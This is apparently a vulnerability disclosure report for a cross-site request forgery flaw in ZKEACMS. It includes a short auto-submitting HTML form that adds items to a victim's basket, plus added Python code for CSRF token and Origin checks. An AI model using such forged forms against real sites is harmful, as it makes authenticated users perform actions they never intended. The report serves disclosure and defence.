Cross-Site Request Forgery (CSRF) in seriawei/zkeacms
Valid
Reported on Jul 17th 2021
✍️ Description
ZKEACMS is vulnerable to cross-site request forgery (CSRF). The app has no CSRF protection mechanism on any of its HTTP requests.
🕵️‍♂️ Proof of Concept
Sample: Add products to the shopping cart.
HTML content:
<form id="form" action="http://localhost:5000/Basket/Add" method="POST">
<input id="product" type="text" name="productId" value="2">
<input type="text" name="quantity" value="10">
<input type="submit">
</form>
<script>
setTimeout(() => { form.submit() }, 2000);
</script>
- Save the above content into an HTML file.
- With an authenticated user, open the HTML file.
- Check the shopping cart.
💥 Impact
When a victim accesses a malicious page, it is possible to perform any action that compromises the victim's account.
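The missing server-side check, as an added example (not ZKEACMS code and not part of the original report): a framework-neutral implementation of a session-bound CSRF token plus an Origin check, which rejects the cross-site POST to /Basket/Add shown in the proof of concept. The secret key, session id, `csrf_token` field name and trusted origin are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions (not from the report): a per-deployment secret, a session id
# taken from the authenticated session, and the origin used in the PoC.
SERVER_KEY = secrets.token_bytes(32)
TRUSTED_ORIGINS = {"http://localhost:5000"}


def _mac(session_id, nonce):
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id):
    """Token rendered into every form as a hidden field: nonce.HMAC(session:nonce)."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def token_is_valid(session_id, token):
    """True only for a token issued for this session; constant-time compare."""
    nonce, _, sig = token.partition(".")
    expected = _mac(session_id, nonce)
    return bool(nonce) and hmac.compare_digest(sig.encode(), expected.encode())


def origin_is_trusted(headers):
    """Defence in depth: a page opened from disk sends 'Origin: null'."""
    source = headers.get("Origin") or headers.get("Referer") or ""
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" in TRUSTED_ORIGINS


def check_state_changing_request(method, headers, form, session_id):
    """Return (status, reason) for a request such as POST /Basket/Add."""
    if method in ("GET", "HEAD", "OPTIONS"):
        return 200, "safe method"
    if not origin_is_trusted(headers):
        return 403, "untrusted origin"
    if not token_is_valid(session_id, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    return 200, "ok"
```

The session cookie alone never authorizes the request: the forged form cannot read the victim's token, so the basket update is refused even though the browser attaches the cookie.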
Occurrences
We have contacted a member of the seriawei/zkeacms team and are waiting to hear back.